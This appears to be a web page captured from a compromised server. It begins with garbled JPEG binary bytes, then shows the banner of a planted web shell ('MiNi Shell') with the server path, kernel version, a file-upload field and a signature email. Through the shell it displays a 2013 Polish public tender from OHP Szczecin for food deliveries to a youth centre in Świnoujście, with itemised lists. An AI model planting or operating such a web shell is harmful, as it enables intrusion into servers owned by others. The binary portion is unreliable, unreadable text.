JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130118/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130118/27346-N-2013.html

<p class="kh_header"><b>Szczecin: Przedmiotem umowy jest dostawa artykułów spożywczych do Ośrodka EWUNIA 
ul. Kasprowicza 11, 72-602 Świnoujście jednostki organizacyjnej ZWK OHP na potrzeby projektu pt; Smaki Europy w ramach Akcji 1.1 - Wymiany Młodzieży programu Młodzież w Działaniu, nr umowy 11/217/2012.</b><br>
<b>Numer ogłoszenia: 27346 - 2013; data zamieszczenia: 18.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy Zachodniopomorska Wojewódzka Komenda w Szczecinie , ul. Dworcowa 19, 70-206 Szczecin, woj. zachodniopomorskie, tel. 091 8126946, faks 091 8127981 w. 36.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zachodniopomorska.ohp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Jednostka Budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem umowy jest dostawa artykułów spożywczych do Ośrodka EWUNIA 
ul. Kasprowicza 11, 72-602 Świnoujście jednostki organizacyjnej ZWK OHP na potrzeby projektu pt; Smaki Europy w ramach Akcji 1.1 - Wymiany Młodzieży programu Młodzież w Działaniu, nr umowy 11/217/2012..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem umowy jest dostawa artykułów spożywczych do Ośrodka EWUNIA 
ul. Kasprowicza 11, 72-602 Świnoujście jednostki organizacyjnej ZWK OHP na potrzeby projektu pt; Smaki Europy w ramach Akcji 1.1 - Wymiany Młodzieży programu Młodzież w Działaniu, nr umowy 11/217/2012..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.60.00.00-4, 15.40.00.00-2, 15.50.00.00-3, 15.30.00.00-1, 15.10.00.00-9, 03.14.25.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie w trybie art. 22 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie w trybie art. 22 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie w trybie art. 22 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie w trybie art. 22 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie w trybie art. 22 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz ofertowy - wypełniony i podpisany przez wykonawcę Załącznik nr 3 do SIWZ.  
2.Kalkulacja ceny do części I - Produkty zwierzęce, mięso i produkty mięsne -ZAŁĄCZNIK 3A do SIWZ (składają wykonawcy przystępujący do tej części zamówienia)
3.Kalkulacja ceny do części II - Różne produkty spożywcze, w tym: mleczarskie, oleje, tłuszcze, produkty przemiału ziarna ZAŁĄCZNIK 3B do SIWZ(składają wykonawcy przystępujący do tej części zamówienia)
4.Kalkulacja ceny do części III -Produkty mrożone -ZAŁĄCZNIK 3C do SIWZ(składają wykonawcy przystępujący do tej części zamówienia)
5.Kalkulacja ceny do części IV - Pieczywo i wypieki -ZAŁĄCZNIK 3D do SIWZ(składają wykonawcy przystępujący do tej części zamówienia)
6.Kalkulacja ceny do części V -Owoce i warzywa -ZAŁĄCZNIK 3E do SIWZ(składają wykonawcy przystępujący do tej części zamówienia)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>. Zamawiający dopuszcza zmianę postanowień zawartej umowy w zakresie: 
a) Zmian organizacyjnych stron, np. zmiana reprezentacji lub siedziby firmy. 
     b) W innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej umowy i mających charakter zmian nieistotnych tzn. takich, o których wiedza na etapie postępowania o udzielenie zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie lub na wynik postępowania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zachodniopomorska.ohp.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zachodniopomorska Wojewódzka Komenda Ochotniczych Hufców Pracy 
    ul. Dworcowa 19, 70-206 Szczecin -pokój 314 (III piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.01.2013 godzina 14:00, miejsce: Zachodniopomorska Wojewódzka Komenda Ochotniczych Hufców Pracy 
    ul. Dworcowa 19, 70-206 Szczecin -sekretariat pokój 304 (III piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pt; Smaki Europy realizowany w ramach Akcji 1.1 - Wymiany Młodzieży programu Młodzież w Działaniu, nr umowy 11/217/2012..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem umowy jest dostawa artykułów spożywczych do Ośrodka EWUNIA 
ul. Kasprowicza 11, 72-602 Świnoujście jednostki organizacyjnej ZWK OHP na potrzeby projektu pt; Smaki Europy w ramach Akcji 1.1 - Wymiany Młodzieży programu Młodzież w Działaniu, 
nr umowy 11/217/2012..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Produkty zwierzęce, mięso i produkty mięsne -ZAŁĄCZNIK 3A do SIWZ - WYPEŁNIA WYKONAWCA SKŁADAJĄCY OFERTĘ NA TĘ CZĘŚĆ ZAMÓWINIA

LP	Nazwa	Jednostka miary	Ilość
1	korpusy drobiowe	kg	11
2	kości ze schabu	kg	2
3	filet z kurczaka	kg	10
4	łopatka bez kości	kg	10,5
5	karkówka bez kości	kg	5,5
6	kurczak świeży	kg	6
7	kurczak wędzony	kg	3
8	boczek wędzony, parzony - paski	kg	2,5
9	boczek mix	kg	1,5
10	parówki cienkie	kg	5
11	kiełbasa parówkowa	kg	5,5
12	kiełbasa biała parzona	kg	4,5
13	kiełbaski bawarskie	kg	4,5
14	polędwica sopocka	kg	1,8
15	szynka konserwowa	kg	7
16	pierś z indyka - wędlina	kg	2
17	mielonka turystyczna	kg	2
18	łopatka z przyprawami - wędlina	kg	2
19	pierś po królewsku - wędlina	kg	2
20	wędzonka z beczki	kg	2
21	pasztet zapiekany z indyka	kg	2
22	schab bez kości	kg	6
23	kiełbasa sucha krakowska	kg	3
24	mielonka drobiowa	kg	2
25	Tusza królika 	szt	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem umowy jest dostawa artykułów spożywczych do Ośrodka EWUNIA 
ul. Kasprowicza 11, 72-602 Świnoujście jednostki organizacyjnej ZWK OHP na potrzeby projektu pt: Smaki Europy w ramach Akcji 1.1 - Wymiany Młodzieży programu Młodzież w Działaniu, 
nr umowy 11/217/2012..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Różne produkty spożywcze, w tym: mleczarskie, oleje, tłuszcze, produkty przemiału ziarna ZAŁĄCZNIK 3B do SIWZ-WYPEŁNIA WYKONAWCA SKŁADAJĄCY OFERTĘ NA TĘ CZĘŚĆ ZAMÓWINIA

LP	Nazwa	Jednostka miary	Ilość
1	makaron nitki	kg	5
2	makaron świderki	kg	4
3	makaron krajanka - tagliatelle	kg	6
4	makaron spagetti	kg	4
5	wafelki typu Grześki	szt	68
6	słone paluszki	kg	1
7	ciasteczka maślane	kg	2
8	cukierki krówki	kg	3
9	czekolada mleczna 100g	szt	34
10	krakersy	kg	1
11	pierniczki z nadzieniem w czekoladzie	kg	5
12	sól	kg	6
13	mąka - pszenna	kg	16
14	cukier	kg	20
15	mleko 2,0 %	l	40
16	mleko 3,2 %	l	40
17	masło - kostka	szt	56
18	olej	l	22
19	herbata typu earl-grey 	saszetka	100
20	herbata czarna aromatyzowana - owoce leśne	saszetka	100
21	herbata czarna ekspresowa 100szt	op	6
22	kawa typu Nescaffe - rozpuszczalna	kg	1
23	kawa mielona typu Premium	kg	1
24	kakao rozpuszczalne typu Puchatek (opakowanie 350g)	op	7
25	dżem - wiaderko	kg	7
26	kasza jęczmienna	kg	3
27	kasza manna	kg	6
28	mąka ziemniaczana	kg	3
29	bułka tarta	kg	12
30	płatki mussli	kg	4
31	płatki czekoladowe	kg	4
32	płatki kukurydziane	kg	5
33	krem czekoladowy typu Nutella	kg	3,6
34	ryż	kg	16
35	cukier puder	kg	2
36	drożdże świeże 100g	szt	3
37	keczup	kg	5
38	musztarda	kg	5
39	ser żółty	kg	6
40	ser zółty wędzony	kg	2
41	twaróg (krajanka)	kg	4
42	ser salami	kg	2
43	serek śmietankowy - wiaderko po 1kg)	kg	10
44	Serki topione krążki (opakowanie 150g)	op	10
45	serki fromage 100g	szt	18
46	serki typu Naturek 100g	szt	6
47	ser mozzarella w zalewie kulka  125 g	szt	17
48	ser pleśniowy typu camembert 120 g	szt	17
49	miody jednorazowe	szt	100
50	jogurty owocowe - (opakowanie 150g)	szt	240
51	koncentat pomidorowy	kg	4
52	kisiel (opakowanie po 60g)	szt	20
53	budyń owocowy (opakowanie po 60g)	szt	30
54	syrop malinowy	l	2
55	ćwikła z chrzanem	kg	2
56	żurawina (opakowanie 300g)	op	6
57	żurek w butelce	l	4
58	sos instant do spagetti bolognese typu Fix Knorr 	szt	14
59	przyprawa do zup typu Magii	l	3
60	przyprawa typu vegeta	kg	2
61	zioła prowansalskie (opakowanie 40g)	op	8
62	tymianek (opakowanie 40g)	op	8
63	curry (opakowanie 40g)	op	8
64	cynamon (opakowanie 20g)	op	8
65	cukier waniliowy (opakowanie 30g)	op	8
66	majeranek (opakowanie 50g)	op	10
67	rosół drobiowy typu Knorr - kostki 12 szt w opakowaniu	op	6
68	ocet	l	2
69	pieprz czarny mielony	kg	1,5
70	papryka konserwowa (słoik 0,9l)	szt	10
71	ogórek konsewowy (słoik 0,9l)	szt	10
72	ananasy w puszce (565g)	szt	8
73	kukurydza konserwowa w puszce (400g)	szt	16
74	fasola czerwona (400g)	szt	8
75	pieczarki konserwowe (słoik 0,9l)	szt	5
76	groszek ptysiowy	kg	0,5
77	śmietana 18% - do zupy	l	9
78	śmietana 18% - kwaśna	l	8
79	majonez typu dekoracyjny Winiary	kg	8
80	słodzik 1200 tabletek	szt	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.60.00.00-4, 15.40.00.00-2, 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 07.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiotem umowy jest dostawa artykułów spożywczych do Ośrodka EWUNIA 
ul. Kasprowicza 11, 72-602 Świnoujście jednostki organizacyjnej ZWK OHP na potrzeby projektu pt; Smaki Europy w ramach Akcji 1.1 - Wymiany Młodzieży programu Młodzież w Działaniu, 
nr umowy 11/217/2012..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Produkty mrożone -ZAŁĄCZNIK 3C do SIWZ - WYPEŁNIA WYKONAWCA SKŁADAJĄCY OFERTĘ NA TĘ CZĘŚĆ ZAMÓWINIA

LP	Nazwa	Jednostka miary	Ilość
1	frytki - mrożone	kg	7,5
2	mieszanka kompotowa - mrożonka	kg	11
3	truskawki - mrożonka	kg	2,5
4	włoszczyzna słupki - mrożonka	kg	10
5	mieszanka warzywna 7 składników - mrożonka	kg	6
6	kalafior - mrożonka	kg	5
7	brokół - mrożonka	kg	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 07.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przedmiotem umowy jest dostawa artykułów spożywczych do Ośrodka EWUNIA
ul. Kasprowicza 11, 72-602 Świnoujście jednostki organizacyjnej ZWK OHP na potrzeby projektu pt; Smaki Europy w ramach Akcji 1.1 - Wymiany Młodzieży programu Młodzież w Działaniu, 
nr umowy 11/217/2012..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pieczywo i wypieki -ZAŁĄCZNIK 3D do  SIWZ - WYPEŁNIA WYKONAWCA SKŁADAJĄCY OFERTĘ NA TĘ CZĘŚĆ ZAMÓWINIA


LP	Nazwa	Jednostka miary	Ilość
1	pączki	szt	34
2	rogale marcińskie	kg	3
3	chleb szczecinski (500g)	szt	45
4	chleb słonecznikowy (500g)	szt	45
5	chleb razowy (400g)	szt	28
6	bułki - kajzerki	szt	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 07.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przedmiotem umowy jest dostawa artykułów spożywczych do Ośrodka EWUNIA
ul. Kasprowicza 11, 72-602 Świnoujście jednostki organizacyjnej ZWK OHP na potrzeby projektu pt; Smaki Europy w ramach Akcji 1.1 - Wymiany Młodzieży programu Młodzież w Działaniu, 
nr umowy 11/217/2012..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Owoce i warzywa -ZAŁĄCZNIK 3E do SIWZ - WYPEŁNIA WYKONAWCA SKŁADAJĄCY OFERTĘ NA TĘ CZĘŚĆ ZAMÓWINI

LP	Nazwa	Jednostka miary	Ilość
1	marchew	kg	12
2	pietruszka korzeń	kg	6
3	seler	kg	11
4	por	kg	7
5	cebula	kg	20
6	buraki	kg	10
7	pomidor	kg	25
8	ogórek świeży	kg	12
9	papryka świeża	kg	12
10	pieczarki	kg	6
11	ziemniaki-15kg	op	7
12	cytryna	kg	7
13	rzodkiew - pęczek	szt	25
14	sałata masłowa	szt	30
15	pietruszka nać - pęczek	szt	25
16	szczypiorek - pęczek	szt	18
17	koperek świeży - pęczek	szt	16
18	jabłka	kg	20
19	mandarynki	kg	20
20	banany	kg	12
21	kapusta kiszona	kg	6
22	kapusta biała	kg	6
23	czosnek	szt	12
24	kapusta pekińska	kg	6
25	jaja	szt	360.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 07.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com